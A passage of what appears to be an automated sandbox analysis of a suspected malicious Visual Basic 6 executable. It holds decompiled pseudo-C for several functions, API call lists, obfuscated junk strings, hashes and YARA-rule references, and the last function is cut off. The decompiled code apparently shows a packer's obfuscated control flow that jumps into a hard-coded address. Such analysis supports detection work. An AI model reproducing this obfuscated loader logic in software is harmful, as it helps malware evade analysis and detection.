				if(_v216 != 0) {
					if( *0x40c33c != 0) {
						_v232 = 0x40c33c;
					} else {
						_push(0x40c33c);
						_push(0x4026c8);
						L0040165A();
						_v232 = 0x40c33c;
					}
					_v216 =  *_v232;
					_v148 = L"Reklappers";
					_v156 = 8;
					_v132 = 0xbc;
					_v140 = 2;
					L00401420();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					L00401420();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t519 =  *((intOrPtr*)( *_v216 + 0x38))(_v216, 0x10, 0x10,  &_v120);
					asm("fclex");
					_v220 = _t519;
					if(_v220 >= 0) {
						_v236 = _v236 & 0x00000000;
					} else {
						_push(0x38);
						_push(0x4026b8);
						_push(_v216);
						_push(_v220);
						L00401654();
						_v236 = _t519;
					}
					_push( &_v120);
					_push( &_v124);
					L00401660();
					_push( &_v124);
					_push( &_v96);
					L00401666();
					L0040164E();
				}
				_v112 = 0x5518;
				_v120 = 2;
				_t373 =  &_v120;
				_push(_t373);
				L00401648();
				L00401678();
				_push(_t373);
				_push(L"Integer");
				L0040167E();
				asm("sbb eax, eax");
				_v216 =  ~( ~( ~_t373));
				L0040166C();
				L0040164E();
				_t377 = _v216;
				if(_t377 != 0) {
					_push(0x8a);
					L00401642();
					_v80 = _t377;
				}
				L0040163C();
				_v160 = 0x3b49;
				_v172 = 0x741641;
				_v88 =  *0x401210;
				 *((intOrPtr*)( *_a4 + 0x738))(_a4,  &_v100,  &_v172, 0xc9bfd870, 0x5b04,  &_v160,  &_v100);
				L0040166C();
				_v172 = 0x13a44f;
				_v160 = 0x3145;
				L0040163C();
				 *_t575 =  *0x40120c;
				_t389 =  *((intOrPtr*)( *_a4 + 0x6f8))(_a4,  &_v100,  &_v100,  &_v160, 0xdf661,  &_v172);
				_v216 = _t389;
				if(_v216 >= 0) {
					_v240 = _v240 & 0x00000000;
				} else {
					_push(0x6f8);
					_push(0x40249c);
					_push(_a4);
					_push(_v216);
					L00401654();
					_v240 = _t389;
				}
				L0040166C();
				_v188 = 0x1d6641b0;
				_v184 = 0x5af8;
				L0040163C();
				_v172 = 0x10e569;
				_t396 =  *((intOrPtr*)( *_a4 + 0x6fc))(_a4,  &_v172,  &_v100,  &_v188,  &_v176);
				_v216 = _t396;
				if(_v216 >= 0) {
					_v244 = _v244 & 0x00000000;
				} else {
					_push(0x6fc);
					_push(0x40249c);
					_push(_a4);
					_push(_v216);
					L00401654();
					_v244 = _t396;
				}
				_v68 = _v176;
				L0040166C();
				_v180 =  *0x401208;
				_v176 =  *0x401204;
				L0040163C();
				_v172 =  *0x401200;
				 *((intOrPtr*)( *_a4 + 0x73c))(_a4,  &_v172,  &_v100,  &_v176,  &_v180);
				L0040166C();
				L0040163C();
				_t539 =  &_v100;
				L0040163C();
				_v172 =  *0x4011f8;
				_t408 =  *((intOrPtr*)( *_a4 + 0x700))(_a4,  &_v100, _t539, _t539,  &_v104, 0x1107);
				_v216 = _t408;
				if(_v216 >= 0) {
					_v248 = _v248 & 0x00000000;
				} else {
					_push(0x700);
					_push(0x40249c);
					_push(_a4);
					_push(_v216);
					L00401654();
					_v248 = _t408;
				}
				L00401636();
				_t576 = _t575 + 0xc;
				_t414 =  *((intOrPtr*)( *_a4 + 0x704))(_a4, 0x75a4, 0x3c4f,  &_v160, 2,  &_v100,  &_v104);
				_v216 = _t414;
				if(_v216 >= 0) {
					_v252 = _v252 & 0x00000000;
				} else {
					_push(0x704);
					_push(0x40249c);
					_push(_a4);
					_push(_v216);
					L00401654();
					_v252 = _t414;
				}
				_v32 = _v160;
				_v188 =  *0x4011f0;
				 *((intOrPtr*)( *_a4 + 0x740))(_a4,  &_v188, L"keelboatman", 0x2307, 0x6481cb);
				_v160 = 0x68a6;
				 *((intOrPtr*)( *_a4 + 0x744))(_a4,  &_v160, L"kartoffelkurens");
				_v172 = 0x2abe7a;
				L0040163C();
				 *((intOrPtr*)( *_a4 + 0x748))(_a4,  &_v100, 0x4f9d,  &_v172, 0x18c9);
				L0040166C();
				_t542 =  &_v100;
				L0040163C();
				_v172 = 0x4d098c;
				_v188 = 0xcfcfeb70;
				_v184 = 0x5af4;
				_v268 =  *0x4011e8;
				_t434 =  *((intOrPtr*)( *_a4 + 0x708))(_a4, 0x3414,  &_v188, _t542, _t542,  &_v172, L"Udsendes4",  &_v100);
				_v216 = _t434;
				if(_v216 >= 0) {
					_v256 = _v256 & 0x00000000;
				} else {
					_push(0x708);
					_push(0x40249c);
					_push(_a4);
					_push(_v216);
					L00401654();
					_v256 = _t434;
				}
				L0040166C();
				_v188 =  *0x4011e0;
				_v160 = 0x6b6;
				_v172 =  *0x4011d8;
				_t440 =  *((intOrPtr*)( *_a4 + 0x70c))(_a4, 0x1a40b7,  &_v172, L"Skibakker3",  &_v160,  &_v188);
				_v216 = _t440;
				if(_v216 >= 0) {
					_v260 = _v260 & 0x00000000;
				} else {
					_push(0x70c);
					_push(0x40249c);
					_push(_a4);
					_push(_v216);
					L00401654();
					_v260 = _t440;
				}
				L0040163C();
				_t445 =  *((intOrPtr*)( *_a4 + 0x710))(_a4,  &_v100, "lon",  &_v160);
				_v216 = _t445;
				if(_v216 >= 0) {
					_v264 = _v264 & 0x00000000;
				} else {
					_push(0x710);
					_push(0x40249c);
					_push(_a4);
					_push(_v216);
					L00401654();
					_v264 = _t445;
				}
				_v72 = _v160;
				L0040166C();
				_t450 =  *((intOrPtr*)( *_a4 + 0x714))(_a4,  &_v172);
				_v216 = _t450;
				if(_v216 >= 0) {
					_v268 = _v268 & 0x00000000;
				} else {
					_push(0x714);
					_push(0x40249c);
					_push(_a4);
					_push(_v216);
					L00401654();
					_v268 = _t450;
				}
				_v40 = _v172;
				_t453 =  *((intOrPtr*)( *_a4 + 0x2b4))(_a4);
				asm("fclex");
				_v216 = _t453;
				if(_v216 >= 0) {
					_v272 = _v272 & 0x00000000;
				} else {
					_push(0x2b4);
					_push(0x40246c);
					_push(_a4);
					_push(_v216);
					L00401654();
					_v272 = _t453;
				}
				while(1) {
					_v132 = 1;
					_v140 = 2;
					L0040162A();
					_t546 =  &_v64;
					L00401630();
					_v204 = 0x4f19e8c0;
					_v200 = 0x5af7;
					_v196 =  *0x4011d0;
					_v160 = 0x454c;
					_v188 = 0xd97a0bc0;
					_v184 = 0x5afd;
					 *_t576 =  *0x4011c8;
					_t464 =  *((intOrPtr*)( *_a4 + 0x718))(_a4, _t546, _t546, 0x50e1e2,  &_v188,  &_v160,  &_v196,  &_v204,  &_v212,  &_v120,  &_v140,  &_v64);
					_v216 = _t464;
					if(_v216 >= 0) {
						_v276 = _v276 & 0x00000000;
					} else {
						_push(0x718);
						_push(0x40249c);
						_push(_a4);
						_push(_v216);
						L00401654();
						_v276 = _t464;
					}
					_v88 = _v212;
					_v84 = _v208;
					_t469 =  *((intOrPtr*)( *_a4 + 0x71c))(_a4);
					_v216 = _t469;
					if(_v216 >= 0) {
						_v280 = _v280 & 0x00000000;
					} else {
						_push(0x71c);
						_push(0x40249c);
						_push(_a4);
						_push(_v216);
						L00401654();
						_v280 = _t469;
					}
					_v164 = 0x16b;
					_v160 = 0x61b6;
					_v188 =  *0x4011c0;
					_v172 = 0x7add9f;
					_t477 =  *((intOrPtr*)( *_a4 + 0x720))(_a4, 0x2742,  &_v172, 0x4531,  &_v188,  &_v160,  &_v164,  &_v168);
					_v216 = _t477;
					if(_v216 >= 0) {
						_v284 = _v284 & 0x00000000;
					} else {
						_push(0x720);
						_push(0x40249c);
						_push(_a4);
						_push(_v216);
						L00401654();
						_v284 = _t477;
					}
					_v76 = _v168;
					_t482 =  *((intOrPtr*)( *_a4 + 0x724))(_a4,  &_v160);
					_v216 = _t482;
					if(_v216 >= 0) {
						_v288 = _v288 & 0x00000000;
					} else {
						_push(0x724);
						_push(0x40249c);
						_push(_a4);
						_push(_v216);
						L00401654();
						_v288 = _t482;
					}
					_v92 = _v160;
					_v188 = 0x218b51f0;
					_v184 = 0x5b06;
					 *_t576 =  *0x4011b8;
					 *((intOrPtr*)( *_a4 + 0x74c))(_a4,  &_v188, _t546,  &_v160);
					_v28 = _v160;
					_t492 =  *((intOrPtr*)( *_a4 + 0x728))(_a4);
					_v216 = _t492;
					if(_v216 >= 0) {
						_v292 = _v292 & 0x00000000;
					} else {
						_push(0x728);
						_push(0x40249c);
						_push(_a4);
						_push(_v216);
						L00401654();
						_v292 = _t492;
					}
					L0040163C();
					_v172 = 0x53d0ea;
					_t498 =  *((intOrPtr*)( *_a4 + 0x72c))(_a4,  &_v172,  &_v100,  &_v188);
					_v216 = _t498;
					if(_v216 >= 0) {
						_v296 = _v296 & 0x00000000;
					} else {
						_push(0x72c);
						_push(0x40249c);
						_push(_a4);
						_push(_v216);
						L00401654();
						_v296 = _t498;
					}
					_v48 = _v188;
					_v44 = _v184;
					L0040166C();
					_v160 = 0x704;
					_v172 = 0x8699bf;
					_v188 =  *0x4011b0;
					 *((intOrPtr*)( *_a4 + 0x750))(_a4,  &_v188,  &_v172,  &_v160);
					_v132 = 0x2ffff;
					_v140 = 0x8003;
					_push( &_v64);
					_t508 =  &_v140;
					_push(_t508);
					L00401624();
					if(_t508 == 0) {
						break;
					}
				}
				_v20 = 0x406aa9;
				_t510 = _v20();
				asm("cld");
				 *_t510 =  *_t510 + _t510;
				 *_t510 =  *_t510 + _t510;
				asm("wait");
				_push(E00408B29);
				L0040164E();
				_t511 =  &_v96;
				_push(_t511);
				_push(0);
				L00401618();
				return _t511;
			}

0x00407fa7
0x00407fb6
0x00407fc2
0x00407fca
0x00407fcd
0x00407fda
0x00407fe3
0x00407fee
0x00407ff1
0x00407ff6
0x00408000
0x00408005
0x00408006
0x0040800b
0x00408012
0x00408018
0x00408022
0x00408030
0x0040803d
0x0040805a
0x0040803f
0x0040803f
0x00408044
0x00408049
0x0040804e
0x0040804e
0x0040806c
0x00408072
0x0040807c
0x00408086
0x0040808d
0x0040809e
0x004080ab
0x004080ac
0x004080ad
0x004080ae
0x004080b2
0x004080bf
0x004080c0
0x004080c1
0x004080c2
0x004080d1
0x004080d4
0x004080d6
0x004080e3
0x00408105
0x004080e5
0x004080e5
0x004080e7
0x004080ec
0x004080f2
0x004080f8
0x004080fd
0x004080fd
0x0040810f
0x00408113
0x00408114
0x0040811c
0x00408120
0x00408121
0x00408129
0x00408129
0x0040812e
0x00408135
0x0040813c
0x0040813f
0x00408140
0x0040814a
0x0040814f
0x00408150
0x00408155
0x0040815c
0x00408162
0x0040816c
0x00408174
0x00408179
0x00408182
0x00408184
0x00408189
0x0040818e
0x0040818e
0x00408199
0x0040819e
0x004081a7
0x004081d4
0x004081df
0x004081e8
0x004081ed
0x004081f7
0x00408208
0x00408227
0x00408236
0x0040823c
0x00408249
0x0040826b
0x0040824b
0x0040824b
0x00408250
0x00408255
0x00408258
0x0040825e
0x00408263
0x00408263
0x00408275
0x0040827a
0x00408284
0x00408296
0x0040829b
0x004082c6
0x004082cc
0x004082d9
0x004082fb
0x004082db
0x004082db
0x004082e0
0x004082e5
0x004082e8
0x004082ee
0x004082f3
0x004082f3
0x00408308
0x0040830e
0x00408319
0x00408325
0x00408333
0x0040833e
0x00408365
0x0040836e
0x0040837b
0x00408385
0x00408388
0x0040839e
0x004083ad
0x004083b3
0x004083c0
0x004083e2
0x004083c2
0x004083c2
0x004083c7
0x004083cc
0x004083cf
0x004083d5
0x004083da
0x004083da
0x004083f3
0x004083f8
0x00408414
0x0040841a
0x00408427
0x00408449
0x00408429
0x00408429
0x0040842e
0x00408433
0x00408436
0x0040843c
0x00408441
0x00408441
0x00408457
0x00408461
0x00408485
0x0040848b
0x004084a8
0x004084ae
0x004084c0
0x004084e2
0x004084eb
0x004084f5
0x004084f8
0x004084fd
0x00408507
0x00408511
0x00408533
0x0040854a
0x00408550
0x0040855d
0x0040857f
0x0040855f
0x0040855f
0x00408564
0x00408569
0x0040856c
0x00408572
0x00408577
0x00408577
0x00408589
0x00408594
0x0040859a
0x004085a9
0x004085d6
0x004085dc
0x004085e9
0x0040860b
0x004085eb
0x004085eb
0x004085f0
0x004085f5
0x004085f8
0x004085fe
0x00408603
0x00408603
0x0040861a
0x00408637
0x0040863d
0x0040864a
0x0040866c
0x0040864c
0x0040864c
0x00408651
0x00408656
0x00408659
0x0040865f
0x00408664
0x00408664
0x0040867a
0x00408681
0x00408695
0x0040869b
0x004086a8
0x004086ca
0x004086aa
0x004086aa
0x004086af
0x004086b4
0x004086b7
0x004086bd
0x004086c2
0x004086c2
0x004086d7
0x004086e2
0x004086e8
0x004086ea
0x004086f7
0x00408719
0x004086f9
0x004086f9
0x004086fe
0x00408703
0x00408706
0x0040870c
0x00408711
0x00408711
0x00408720
0x00408720
0x00408727
0x00408740
0x00408747
0x0040874a
0x0040874f
0x00408759
0x00408769
0x0040876f
0x00408778
0x00408782
0x004087bc
0x004087c7
0x004087cd
0x004087da
0x004087fc
0x004087dc
0x004087dc
0x004087e1
0x004087e6
0x004087e9
0x004087ef
0x004087f4
0x004087f4
0x00408809
0x00408812
0x0040881d
0x00408823
0x00408830
0x00408852
0x00408832
0x00408832
0x00408837
0x0040883c
0x0040883f
0x00408845
0x0040884a
0x0040884a
0x00408859
0x00408862
0x00408871
0x00408877
0x004088b6
0x004088bc
0x004088c9
0x004088eb
0x004088cb
0x004088cb
0x004088d0
0x004088d5
0x004088d8
0x004088de
0x004088e3
0x004088e3
0x004088f9
0x0040890c
0x00408912
0x0040891f
0x00408941
0x00408921
0x00408921
0x00408926
0x0040892b
0x0040892e
0x00408934
0x00408939
0x00408939
0x0040894f
0x00408953
0x0040895d
0x00408975
0x00408987
0x00408994
0x004089a0
0x004089a6
0x004089b3
0x004089d5
0x004089b5
0x004089b5
0x004089ba
0x004089bf
0x004089c2
0x004089c8
0x004089cd
0x004089cd
0x004089e4
0x004089e9
0x00408a0d
0x00408a13
0x00408a20
0x00408a42
0x00408a22
0x00408a22
0x00408a27
0x00408a2c
0x00408a2f
0x00408a35
0x00408a3a
0x00408a3a
0x00408a4f
0x00408a58
0x00408a5e
0x00408a63
0x00408a6c
0x00408a7c
0x00408a9f
0x00408aa5
0x00408aac
0x00408ab9
0x00408aba
0x00408ac0
0x00408ac1
0x00408acb
0x00000000
0x00000000
0x00408acd
0x00408ad7
0x00408ada
0x00408ae2
0x00408ae3
0x00408ae5
0x00408ae7
0x00408ae8
0x00408b18
0x00408b1d
0x00408b20
0x00408b21
0x00408b23
0x00408b28

APIs

__vbaChkstk.MSVBVM60(?,00401426), ref: 00407FC2
#519.MSVBVM60( tt,?,?,?,?,00401426), ref: 00407FF6
__vbaStrMove.MSVBVM60( tt,?,?,?,?,00401426), ref: 00408000
__vbaStrCmp.MSVBVM60(00402684,00000000, tt,?,?,?,?,00401426), ref: 0040800B
__vbaFreeStr.MSVBVM60(00402684,00000000, tt,?,?,?,?,00401426), ref: 00408022
__vbaNew2.MSVBVM60(004026C8,0040C33C,00402684,00000000, tt,?,?,?,?,00401426), ref: 00408049
__vbaChkstk.MSVBVM60(?), ref: 0040809E
__vbaChkstk.MSVBVM60(?), ref: 004080B2
__vbaHresultCheckObj.MSVBVM60(00000000,?,004026B8,00000038), ref: 004080F8
__vbaVar2Vec.MSVBVM60(?,?), ref: 00408114
__vbaAryMove.MSVBVM60(?,?,?,?), ref: 00408121
__vbaFreeVar.MSVBVM60(?,?,?,?), ref: 00408129
#591.MSVBVM60(00000002), ref: 00408140
__vbaStrMove.MSVBVM60(00000002), ref: 0040814A
__vbaStrCmp.MSVBVM60(Integer,00000000,00000002), ref: 00408155
__vbaFreeStr.MSVBVM60(Integer,00000000,00000002), ref: 0040816C
__vbaFreeVar.MSVBVM60(Integer,00000000,00000002), ref: 00408174
#569.MSVBVM60(0000008A,Integer,00000000,00000002), ref: 00408189
__vbaStrCopy.MSVBVM60(Integer,00000000,00000002), ref: 00408199
__vbaFreeStr.MSVBVM60(?,00741641,C9BFD870,00005B04,00003B49,?), ref: 004081E8
__vbaStrCopy.MSVBVM60(?,00741641,C9BFD870,00005B04,00003B49,?), ref: 00408208
__vbaHresultCheckObj.MSVBVM60(?,00401218,0040249C,000006F8,?,00003145,000DF661,0013A44F,?,00741641,C9BFD870,00005B04,00003B49,?), ref: 0040825E
__vbaFreeStr.MSVBVM60(?,?,?,?,?,?,?,?,00003145,000DF661,0013A44F,?,00741641,C9BFD870,00005B04,00003B49), ref: 00408275
__vbaStrCopy.MSVBVM60(?,?,?,?,?,?,?,?,00003145,000DF661,0013A44F,?,00741641,C9BFD870,00005B04,00003B49), ref: 00408296
__vbaHresultCheckObj.MSVBVM60(00000000,00401218,0040249C,000006FC,?,?,?,?,?,?,?,?,00003145,000DF661,0013A44F), ref: 004082EE
__vbaFreeStr.MSVBVM60(?,?,?,?,?,?,?,?,00003145,000DF661,0013A44F,?,00741641,C9BFD870,00005B04,00003B49), ref: 0040830E
__vbaStrCopy.MSVBVM60(?,?,?,?,?,?,?,?,00003145,000DF661,0013A44F,?,00741641,C9BFD870,00005B04,00003B49), ref: 00408333
__vbaFreeStr.MSVBVM60(?,?,?,?,?,?,?,?,00003145,000DF661,0013A44F,?,00741641,C9BFD870,00005B04,00003B49), ref: 0040836E
__vbaStrCopy.MSVBVM60(?,?,?,?,?,?,?,?,00003145,000DF661,0013A44F,?,00741641,C9BFD870,00005B04,00003B49), ref: 0040837B
__vbaStrCopy.MSVBVM60(?,?,?,?,?,?,?,?,00003145,000DF661,0013A44F,?,00741641,C9BFD870,00005B04,00003B49), ref: 00408388
__vbaHresultCheckObj.MSVBVM60(00000000,00401218,0040249C,00000700,?,?,?,00001107), ref: 004083D5
__vbaFreeStrList.MSVBVM60(00000002,?,?,?,?,?,00001107,?,?,?,?,?,?,?,?,00003145), ref: 004083F3
__vbaHresultCheckObj.MSVBVM60(00000000,00401218,0040249C,00000704), ref: 0040843C
__vbaStrCopy.MSVBVM60 ref: 004084C0
__vbaFreeStr.MSVBVM60 ref: 004084EB
__vbaStrCopy.MSVBVM60 ref: 004084F8
__vbaHresultCheckObj.MSVBVM60(00000000,00401218,0040249C,00000708,?,?,004D098C,Udsendes4,?), ref: 00408572
__vbaFreeStr.MSVBVM60(?,?,004D098C,Udsendes4,?), ref: 00408589
__vbaHresultCheckObj.MSVBVM60(00000000,00401218,0040249C,0000070C,?,?,004D098C,Udsendes4,?), ref: 004085FE
__vbaStrCopy.MSVBVM60(?,?,004D098C,Udsendes4,?), ref: 0040861A
__vbaHresultCheckObj.MSVBVM60(00000000,00401218,0040249C,00000710,?,?,004D098C,Udsendes4,?), ref: 0040865F
__vbaFreeStr.MSVBVM60(?,?,004D098C,Udsendes4,?), ref: 00408681
__vbaHresultCheckObj.MSVBVM60(00000000,00401218,0040249C,00000714,?,?,004D098C,Udsendes4,?), ref: 004086BD
__vbaHresultCheckObj.MSVBVM60(00000000,00401218,0040246C,000002B4,?,?,004D098C,Udsendes4,?), ref: 0040870C
__vbaVarAdd.MSVBVM60(?,00000002,?,?,?,004D098C,Udsendes4,?), ref: 00408740
__vbaVarMove.MSVBVM60(?,00000002,?,?,?,004D098C,Udsendes4,?), ref: 0040874A
__vbaHresultCheckObj.MSVBVM60(00000000,00401218,0040249C,00000718,?,?,0050E1E2,D97A0BC0,0000454C,?,4F19E8C0,?,?,00000002,?,00008003), ref: 004087EF
__vbaHresultCheckObj.MSVBVM60(00000000,00401218,0040249C,0000071C,?,?,0050E1E2,D97A0BC0,0000454C,?,4F19E8C0,?,?,00000002,?,00008003), ref: 00408845
__vbaHresultCheckObj.MSVBVM60(00000000,00401218,0040249C,00000720,?,?,0050E1E2,D97A0BC0,0000454C,?,4F19E8C0,?,?,00000002,?,00008003), ref: 004088DE
__vbaHresultCheckObj.MSVBVM60(00000000,00401218,0040249C,00000724,?,?,0050E1E2,D97A0BC0,0000454C,?,4F19E8C0,?,?,00000002,?,00008003), ref: 00408934
__vbaHresultCheckObj.MSVBVM60(00000000,00401218,0040249C,00000728,?,000061B6,00000000,00401218,0040249C,00000724,?,?,0050E1E2,D97A0BC0,0000454C,?), ref: 004089C8
__vbaStrCopy.MSVBVM60(?,000061B6,?,?,0050E1E2,D97A0BC0,0000454C,?,4F19E8C0,?,?,00000002,?,?,?,004D098C), ref: 004089E4
__vbaHresultCheckObj.MSVBVM60(00000000,00401218,0040249C,0000072C,?,000061B6,00000000,00401218,0040249C,00000724,?,?,0050E1E2,D97A0BC0,0000454C,?), ref: 00408A35
__vbaFreeStr.MSVBVM60(?,000061B6,?,?,0050E1E2,D97A0BC0,0000454C,?,4F19E8C0,?,?,00000002,?,?,?,004D098C), ref: 00408A5E
__vbaVarTstLt.MSVBVM60(00008003,?,?,000061B6,?,?,0050E1E2,D97A0BC0,0000454C,?,4F19E8C0,?,?,00000002,?), ref: 00408AC1
__vbaFreeVar.MSVBVM60(00408B29,?,000061B6,?,?,0050E1E2,D97A0BC0,0000454C,?,4F19E8C0,?,?,00000002,?), ref: 00408B18
__vbaAryDestruct.MSVBVM60(00000000,?,00408B29,?,000061B6,?,?,0050E1E2,D97A0BC0,0000454C,?,4F19E8C0,?,?,00000002,?), ref: 00408B23

Strings

BIBLIOTEKSASSISTENT, xrefs: 00408612
Transcriptional9, xrefs: 00408191
keelboatman, xrefs: 00408471
tt, xrefs: 00407FF1
Udsendes4, xrefs: 0040851F
BENAMES, xrefs: 00408200
Unfixedness1, xrefs: 00408373
Skibakker3, xrefs: 004085BD
lon, xrefs: 00408626
Integer, xrefs: 00408150
Unbetide1, xrefs: 00408380
Reklappers, xrefs: 00408072
VASKERIERNES, xrefs: 004084B8
Barreleye, xrefs: 0040828E
Trifliers, xrefs: 004084F0
TOLDPOSTKONTORET, xrefs: 004089DC
REJUVENIZING, xrefs: 0040832B
kartoffelkurens, xrefs: 00408494
LE, xrefs: 0040876F

Memory Dump Source

Source File: 00000000.00000002.457742427.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.457737838.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.457750719.000000000040C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.457755682.000000000040E000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$CheckHresult$Free$Copy$Move$Chkstk$#519#569#591DestructListNew2Var2
String ID: tt$BENAMES$BIBLIOTEKSASSISTENT$Barreleye$Integer$LE$REJUVENIZING$Reklappers$Skibakker3$TOLDPOSTKONTORET$Transcriptional9$Trifliers$Udsendes4$Unbetide1$Unfixedness1$VASKERIERNES$kartoffelkurens$keelboatman$lon
API String ID: 3969615492-959738972
Opcode ID: 56967fd24bb1235184fa42cea51305a45d9d487414867943f77e70585181ea3b
Instruction ID: e2e19ee18756df5fa8c8b9dc915fc5b579a6480964c017f83f3f8f939111b0cc
Opcode Fuzzy Hash: 56967fd24bb1235184fa42cea51305a45d9d487414867943f77e70585181ea3b
Instruction Fuzzy Hash: CB62E675900228EFDB10DF90CD89BDDBBB9AF08304F0084EAE549BB1A1DB795A85CF55

Uniqueness

Uniqueness Score: -1.00%

Function 004091BF, Relevance: 31.6, APIs: 16, Strings: 2, Instructions: 128
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E004091BF(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v28;
				signed int _v32;
				char _v36;
				char _v52;
				char _v68;
				intOrPtr _v92;
				intOrPtr _v100;
				intOrPtr _v108;
				char _v116;
				signed int _v120;
				void* _v124;
				signed int _v128;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				intOrPtr* _v152;
				signed int _v156;
				signed int _t72;
				short _t74;
				signed int _t77;
				signed int _t81;
				char* _t85;
				void* _t98;
				void* _t100;
				intOrPtr _t101;

				_t101 = _t100 - 0xc;
				 *[fs:0x0] = _t101;
				L00401420();
				_v16 = _t101;
				_v12 = 0x4012a8;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x401426, _t98);
				_push(L"4:4:4");
				_push( &_v52); // executed
				L004015AC(); // executed
				_push( &_v52);
				L004015B2();
				L00401678();
				L0040164E();
				_v92 = 0x40298c;
				_v100 = 8;
				L004015BE();
				_push( &_v68);
				_t72 =  &_v52;
				_push(_t72);
				L004015A6();
				_v120 = _t72;
				if(_v120 >= 0) {
					_v144 = _v144 & 0x00000000;
				} else {
					_push(_v120);
					L004015A0();
					_v144 = _t72;
				}
				_v108 = 2;
				_v116 = 0x8002;
				_push( &_v68);
				_t74 =  &_v116;
				_push(_t74);
				L00401612();
				_v124 = _t74;
				_push( &_v68);
				_push( &_v52);
				_push(2);
				L00401600();
				_t77 = _v124;
				if(_t77 != 0) {
					_t81 =  *((intOrPtr*)( *_a4 + 0x160))(_a4,  &_v32);
					asm("fclex");
					_v120 = _t81;
					if(_v120 >= 0) {
						_v148 = _v148 & 0x00000000;
					} else {
						_push(0x160);
						_push(0x40246c);
						_push(_a4);
						_push(_v120);
						L00401654();
						_v148 = _t81;
					}
					if( *0x40c33c != 0) {
						_v152 = 0x40c33c;
					} else {
						_push(0x40c33c);
						_push(0x4026c8);
						L0040165A();
						_v152 = 0x40c33c;
					}
					_v124 =  *_v152;
					_v140 = _v32;
					_v32 = _v32 & 0x00000000;
					_t85 =  &_v36;
					L0040159A();
					_t77 =  *((intOrPtr*)( *_v124 + 0x40))(_v124, _t85, _t85, _v140, L"Prfekt");
					asm("fclex");
					_v128 = _t77;
					if(_v128 >= 0) {
						_v156 = _v156 & 0x00000000;
					} else {
						_push(0x40);
						_push(0x4026b8);
						_push(_v124);
						_push(_v128);
						L00401654();
						_v156 = _t77;
					}
					L004015E8();
				}
				_push(E004093C1);
				L0040166C();
				return _t77;
			}

0x004091c2
0x004091d1
0x004091dd
0x004091e5
0x004091e8
0x004091ef
0x004091fe
0x00409201
0x00409209
0x0040920a
0x00409212
0x00409213
0x0040921d
0x00409225
0x0040922a
0x00409231
0x0040923e
0x00409246
0x00409247
0x0040924a
0x0040924b
0x00409250
0x00409257
0x00409269
0x00409259
0x00409259
0x0040925c
0x00409261
0x00409261
0x00409270
0x00409277
0x00409281
0x00409282
0x00409285
0x00409286
0x0040928b
0x00409292
0x00409296
0x00409297
0x00409299
0x004092a1
0x004092a7
0x004092b9
0x004092bf
0x004092c1
0x004092c8
0x004092e7
0x004092ca
0x004092ca
0x004092cf
0x004092d4
0x004092d7
0x004092da
0x004092df
0x004092df
0x004092f5
0x00409312
0x004092f7
0x004092f7
0x004092fc
0x00409301
0x00409306
0x00409306
0x00409324
0x0040932a
0x00409330
0x0040933f
0x00409343
0x00409351
0x00409354
0x00409356
0x0040935d
0x00409379
0x0040935f
0x0040935f
0x00409361
0x00409366
0x00409369
0x0040936c
0x00409371
0x00409371
0x00409383
0x00409383
0x00409388
0x004093bb
0x004093c0

APIs

__vbaChkstk.MSVBVM60(?,00401426), ref: 004091DD
#541.MSVBVM60(?,4:4:4,?,?,?,?,00401426), ref: 0040920A
__vbaStrVarMove.MSVBVM60(?,?,4:4:4,?,?,?,?,00401426), ref: 00409213
__vbaStrMove.MSVBVM60(?,?,4:4:4,?,?,?,?,00401426), ref: 0040921D
__vbaFreeVar.MSVBVM60(?,?,4:4:4,?,?,?,?,00401426), ref: 00409225
__vbaVarDup.MSVBVM60 ref: 0040923E
#564.MSVBVM60(?,?), ref: 0040924B
__vbaHresultCheck.MSVBVM60(00000000,?,?,?,?,?), ref: 0040925C
__vbaVarTstNe.MSVBVM60(00008002,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00409286
__vbaFreeVarList.MSVBVM60(00000002,?,?,00008002,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00409299
__vbaHresultCheckObj.MSVBVM60(00000000,004012A8,0040246C,00000160), ref: 004092DA
__vbaNew2.MSVBVM60(004026C8,0040C33C), ref: 00409301
__vbaObjSet.MSVBVM60(?,?,Prfekt), ref: 00409343
__vbaHresultCheckObj.MSVBVM60(00000000,?,004026B8,00000040), ref: 0040936C
__vbaFreeObj.MSVBVM60(00000000,?,004026B8,00000040), ref: 00409383
__vbaFreeStr.MSVBVM60(004093C1,?,?,00401426), ref: 004093BB

Strings

4:4:4, xrefs: 00409201
Prfekt, xrefs: 00409334

Memory Dump Source

Source File: 00000000.00000002.457742427.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.457737838.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.457750719.000000000040C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.457755682.000000000040E000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CheckHresult$Move$#541#564ChkstkListNew2
String ID: 4:4:4$Prfekt
API String ID: 2750142420-1222765967
Opcode ID: e8ec0ab1109bf9b3c70991b812c82ec3f76075bdd3e313a206ebb3c7da8544d2
Instruction ID: 164dd87199834404097103c0b7eb1027da94a51da7f3bedb0d1792f556e83e60
Opcode Fuzzy Hash: e8ec0ab1109bf9b3c70991b812c82ec3f76075bdd3e313a206ebb3c7da8544d2
Instruction Fuzzy Hash: 0051F570910218AFDB10EFA1CC89BDDBBB8BB08704F24857AE505B71E2DB7959458F58

Uniqueness

Uniqueness Score: -1.00%

Function 0040AB34, Relevance: 16.6, APIs: 11, Instructions: 62
COMMON

Download Yara Rule

C-Code - Quality: 65%

			E0040AB34(void* __ebx, void* __edi, void* __esi, void* __eflags, long long __fp0, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				long long* _v16;
				void* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v52;
				char* _v60;
				intOrPtr _v68;
